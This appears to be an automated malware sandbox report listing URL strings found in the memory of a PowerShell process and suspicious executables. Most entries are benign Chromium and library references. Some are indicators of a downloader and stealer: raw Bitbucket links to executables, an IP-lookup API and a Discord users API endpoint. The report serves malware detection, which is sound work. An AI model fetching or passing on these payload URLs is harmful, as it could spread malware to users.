                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7405
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/8308
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/8315
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/8319
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/8381
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/8417
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/8471
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.s
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232D139000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2312453126.000001232D196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2312453126.000001232D200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232D1AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2312453126.000001232D1D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2312453126.000001232CD69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2312453126.000001232D200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232CD69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/gtrg432h38f32/hrthrthrth/raw/d2fdb6c3898430155b196cef7b24e6f44a41b549/LEM.exe
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232CD69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/gtrg432h38f32/hrthrthrth/raw/d2fdb6c3898430155b196cef7b24e6f44a41b549/LEMN.exe
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232CD69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/gtrg432h38f32/hrthrthrth/raw/d2fdb6c3898430155b196cef7b24e6f44a41b549/lclp.exe
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232CD69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/gtrg432h38f32/hrthrthrth/raw/d2fdb6c3898430155b196cef7b24e6f44a41b549/ll.exe
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232CD69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/gtrg432h38f32/hrthrthrth/raw/d2fdb6c3898430155b196cef7b24e6f44a41b549/ll.exeP
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232CD65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/gtrg432h38f32/hrthrthrth/raw/d2fdb6c3898430155b196cef7b24e6f44a41b549/ll.exeZ
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232D139000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2312453126.000001232D196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2312453126.000001232D200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2566540118.0000000003521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=es&category=theme81https://myactivity.google.com/myactivity/?u
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2566452692.0000000003521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=es-419&category=theme81https://myactivity.google.com/myactivit
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2566452692.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566540118.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566943172.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566049332.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567606134.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566722886.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567796035.0000000003521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2566452692.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566540118.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566943172.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566049332.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567606134.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566722886.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567796035.0000000003521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2566452692.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566540118.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566943172.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566049332.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567606134.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566722886.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567796035.0000000003521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2566452692.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566540118.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566943172.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566049332.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567606134.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566722886.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567796035.0000000003521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2566452692.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566540118.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566943172.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566049332.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567606134.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566722886.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567796035.0000000003521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2566452692.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566540118.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566943172.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566049332.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567606134.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566722886.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567796035.0000000003521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2566260449.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2570589726.0000000003553000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566452692.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566540118.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566347879.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566943172.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2565806232.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2568336922.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566049332.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567606134.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567796035.0000000003521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/chromium/src/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/external/github.com/intel/tinycbor.git
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/vulkan-deps/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/webm/libwebm
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/webm/libwebp
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#clear
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count-map
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#countreset
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#table
                        Source: powershell.exe, 00000001.00000002.2376367107.000001233BD15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000001.00000002.2376367107.000001233BD15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000001.00000002.2376367107.000001233BD15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1042393
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1046462
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1060012
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1091824
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1137851
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1300575
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1356053
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/40279678
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/593024
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/593024selectViewInGeometryShaderThe
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/650547
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/650547callClearTwiceUsing
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/655534
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/655534useSystemMemoryForConstantBuffersCopying
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/705865
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/710443
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/811661
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/848952
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/v8/7848
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://creativecommons.org/licenses/by/3.0/
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232D200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d136azpfpnge1l.cloudfront.net/;
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232D200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d301sr5gafysq2.cloudfront.net/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7231#section-6.4
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7238
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2396268474.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/android/guides/setup
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#interface-abortcontroller
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#interface-eventtarget
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2566452692.0000000003521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ejemplo.com.Se
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#fetch-method
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#headers-class
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#request-class
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#response-class
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Cyan4973/xxHash
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/GPUOpen-LibrariesAndSDKs/VulkanMemoryAllocator
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/GoogleChromeLabs/text-fragments-polyfill
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Headers
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Headers.git
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Tools
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Tools.git
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/Vulkan-Headers
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/Vulkan-Loader
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Maratyszcza/pthreadpool
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232BEC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/PortAudio/portaudio/tree/master/src/common
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ReactiveX/rxjs
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/SeleniumHQ/selenium/tree/trunk
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Squirrel/Squirrel.Mac
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WebAssembly/wasm-c-api/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/aawc/unrar.git
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/addaleax/eventemitter-asyncresource
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/brailcom/speechd
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorith
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/denoland/deno
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/denoland/deno/blob/main/LICENSE.md.
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/denoland/deno/blob/v1.29.1/ext/crypto/00_crypto.js#L195
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dpranke/typ.git
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/etingof/pyasn1
